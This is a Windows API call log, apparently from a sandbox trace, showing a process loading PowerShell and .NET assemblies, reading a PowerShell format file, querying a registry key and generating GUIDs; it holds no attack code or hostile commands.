	[0377.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0377.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0377.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0377.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0377.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0377.292] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0377.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0377.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0377.295] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0377.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0377.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0377.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0377.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0377.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0377.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0377.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0377.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0377.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0377.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0377.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0377.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0377.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0378.024] VirtualQuery (in: lpAddress=0x14bb00, lpBuffer=0x14c9c0, dwLength=0x30 | out: lpBuffer=0x14c9c0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.025] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xc14de9a7, Data2=0xe294, Data3=0x4838, Data4=([0]=0x86, [1]=0x71, [2]=0x43, [3]=0x9f, [4]=0x59, [5]=0xd2, [6]=0xd4, [7]=0x11))) returned 0x0
	[0378.026] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x6434cfe3, Data2=0x1ff, Data3=0x4bf3, Data4=([0]=0xab, [1]=0xd3, [2]=0xbf, [3]=0x6d, [4]=0x62, [5]=0xbb, [6]=0x1f, [7]=0xbc))) returned 0x0
	[0378.027] VirtualQuery (in: lpAddress=0x14bcb0, lpBuffer=0x14cb70, dwLength=0x30 | out: lpBuffer=0x14cb70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.027] VirtualQuery (in: lpAddress=0x14bcb0, lpBuffer=0x14cb70, dwLength=0x30 | out: lpBuffer=0x14cb70*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.029] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x706d834, Data2=0xfeb1, Data3=0x48b8, Data4=([0]=0x8f, [1]=0x9f, [2]=0xf7, [3]=0xfd, [4]=0x8d, [5]=0x1, [6]=0xa2, [7]=0x43))) returned 0x0
	[0378.032] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x449b791e, Data2=0x7111, Data3=0x4ea7, Data4=([0]=0x9d, [1]=0x47, [2]=0x40, [3]=0x22, [4]=0x62, [5]=0x33, [6]=0x60, [7]=0x3))) returned 0x0
	[0378.032] VirtualQuery (in: lpAddress=0x14bf00, lpBuffer=0x14cdc0, dwLength=0x30 | out: lpBuffer=0x14cdc0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.032] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.033] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.033] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x5b9a1ab7, Data2=0xc523, Data3=0x4349, Data4=([0]=0xb3, [1]=0x62, [2]=0x54, [3]=0xb5, [4]=0x5a, [5]=0x11, [6]=0x12, [7]=0x34))) returned 0x0
	[0378.033] VirtualQuery (in: lpAddress=0x14bf00, lpBuffer=0x14cdc0, dwLength=0x30 | out: lpBuffer=0x14cdc0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.033] VirtualQuery (in: lpAddress=0x14bd20, lpBuffer=0x14cbe0, dwLength=0x30 | out: lpBuffer=0x14cbe0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.034] VirtualQuery (in: lpAddress=0x14b570, lpBuffer=0x14c430, dwLength=0x30 | out: lpBuffer=0x14c430*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.034] VirtualQuery (in: lpAddress=0x14b570, lpBuffer=0x14c430, dwLength=0x30 | out: lpBuffer=0x14c430*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.034] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xee648b22, Data2=0xacaa, Data3=0x440d, Data4=([0]=0x87, [1]=0x0, [2]=0x16, [3]=0xad, [4]=0x27, [5]=0x96, [6]=0x21, [7]=0xbe))) returned 0x0
	[0378.034] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x5291ac22, Data2=0xfdca, Data3=0x462e, Data4=([0]=0x90, [1]=0x6a, [2]=0x3f, [3]=0x6e, [4]=0x5f, [5]=0xbb, [6]=0xe, [7]=0x46))) returned 0x0
	[0378.034] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0378.034] SetErrorMode (uMode=0x1) returned 0x1
	[0378.034] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0378.035] GetFileType (hFile=0x300) returned 0x1
	[0378.035] SetErrorMode (uMode=0x1) returned 0x1
	[0378.035] GetFileType (hFile=0x300) returned 0x1
	[0378.035] ReadFile (in: hFile=0x300, lpBuffer=0x33221b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x33221b0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.036] ReadFile (in: hFile=0x300, lpBuffer=0x33221b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x33221b0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.036] ReadFile (in: hFile=0x300, lpBuffer=0x33221b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x33221b0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.037] ReadFile (in: hFile=0x300, lpBuffer=0x33221b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x33221b0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.037] ReadFile (in: hFile=0x300, lpBuffer=0x33221b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x33221b0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.037] ReadFile (in: hFile=0x300, lpBuffer=0x33221b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x33221b0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.038] ReadFile (in: hFile=0x300, lpBuffer=0x33221b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x33221b0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.039] ReadFile (in: hFile=0x300, lpBuffer=0x33221b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x33221b0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.039] ReadFile (in: hFile=0x300, lpBuffer=0x33221b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x33221b0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.039] ReadFile (in: hFile=0x300, lpBuffer=0x33221b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x33221b0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.040] ReadFile (in: hFile=0x300, lpBuffer=0x33221b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x33221b0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.040] ReadFile (in: hFile=0x300, lpBuffer=0x33221b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x33221b0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.040] ReadFile (in: hFile=0x300, lpBuffer=0x33221b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x33221b0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.040] ReadFile (in: hFile=0x300, lpBuffer=0x33221b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x33221b0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.041] ReadFile (in: hFile=0x300, lpBuffer=0x33221b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x33221b0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.041] ReadFile (in: hFile=0x300, lpBuffer=0x33221b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x33221b0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.042] ReadFile (in: hFile=0x300, lpBuffer=0x33221b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x33221b0*, lpNumberOfBytesRead=0x14cfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0378.042] ReadFile (in: hFile=0x300, lpBuffer=0x33221b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x33221b0*, lpNumberOfBytesRead=0x14cfd8*=0xbce, lpOverlapped=0x0) returned 1
	[0378.042] ReadFile (in: hFile=0x300, lpBuffer=0x33218e6, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x33218e6*, lpNumberOfBytesRead=0x14cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0378.043] ReadFile (in: hFile=0x300, lpBuffer=0x33221b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cfd8, lpOverlapped=0x0 | out: lpBuffer=0x33221b0*, lpNumberOfBytesRead=0x14cfd8*=0x0, lpOverlapped=0x0) returned 1
	[0378.043] CloseHandle (hObject=0x300) returned 1
	[0378.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0378.043] SetErrorMode (uMode=0x1) returned 0x1
	[0378.043] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cf80 | out: lpFileInformation=0x14cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0378.043] SetErrorMode (uMode=0x1) returned 0x1
	[0378.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0378.044] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d068 | out: phkResult=0x14d068*=0x300) returned 0x0
	[0378.053] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cfec, lpData=0x0, lpcbData=0x14cfe8*=0x0 | out: lpType=0x14cfec*=0x1, lpData=0x0, lpcbData=0x14cfe8*=0x56) returned 0x0
	[0378.053] CoTaskMemAlloc (cb=0x5a) returned 0x42efa0
	[0378.053] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cfbc, lpData=0x42efa0, lpcbData=0x14cfb8*=0x56 | out: lpType=0x14cfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14cfb8*=0x56) returned 0x0
	[0378.054] CoTaskMemFree (pv=0x42efa0) 
	[0378.054] RegCloseKey (hKey=0x300) returned 0x0
	[0378.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0378.054] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0378.055] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x4be6a430, Data2=0x34b4, Data3=0x42b5, Data4=([0]=0xaf, [1]=0x12, [2]=0xe4, [3]=0xe, [4]=0xd1, [5]=0xc3, [6]=0x9a, [7]=0x79))) returned 0x0
	[0378.055] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x13cec71e, Data2=0x5ce1, Data3=0x4b4f, Data4=([0]=0xa5, [1]=0xb1, [2]=0xa6, [3]=0x1a, [4]=0xe2, [5]=0x4c, [6]=0x3d, [7]=0xf2))) returned 0x0
	[0378.055] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xcae10c04, Data2=0xd78a, Data3=0x40d9, Data4=([0]=0x90, [1]=0x68, [2]=0x83, [3]=0x0, [4]=0xb0, [5]=0x43, [6]=0xc6, [7]=0xed))) returned 0x0
	[0378.056] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x129d5829, Data2=0x1ad5, Data3=0x4f74, Data4=([0]=0x8a, [1]=0xbc, [2]=0x99, [3]=0x3a, [4]=0x3f, [5]=0x4b, [6]=0x6a, [7]=0x3f))) returned 0x0
	[0378.056] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xa06d26e, Data2=0xca0a, Data3=0x474c, Data4=([0]=0xbc, [1]=0x57, [2]=0x41, [3]=0x34, [4]=0x11, [5]=0x34, [6]=0x6, [7]=0x4))) returned 0x0
	[0378.056] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xf3302029, Data2=0x81d7, Data3=0x4338, Data4=([0]=0xa2, [1]=0x5e, [2]=0xdf, [3]=0xcc, [4]=0x64, [5]=0xce, [6]=0x86, [7]=0x9))) returned 0x0
	[0378.056] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.057] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x757cdd83, Data2=0x7ee0, Data3=0x48d4, Data4=([0]=0xa7, [1]=0xfb, [2]=0x80, [3]=0x3d, [4]=0x3f, [5]=0x75, [6]=0xe8, [7]=0x72))) returned 0x0
	[0378.057] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.058] VirtualQuery (in: lpAddress=0x14bc40, lpBuffer=0x14cb00, dwLength=0x30 | out: lpBuffer=0x14cb00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0378.059] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0xb3cb43df, Data2=0xdd6a, Data3=0x43f8, Data4=([0]=0x9a, [1]=0xaf, [2]=0xfa, [3]=0xee, [4]=0x99, [5]=0x62, [6]=0xf, [7]=0x53))) returned 0x0
	[0378.059] CoCreateGuid (in: pguid=0x14d290 | out: pguid=0x14d290*(Data1=0x5e2b1bbf, Data2=0x725f, Data3=0x457e, Data4=([0]=0xb5, [1]=0xac, [2]=0xb9, [3]=0x31, [4]=0xa2, [5]=0xdb, [6]=0xb2, [7]=0x3))) returned 0x0
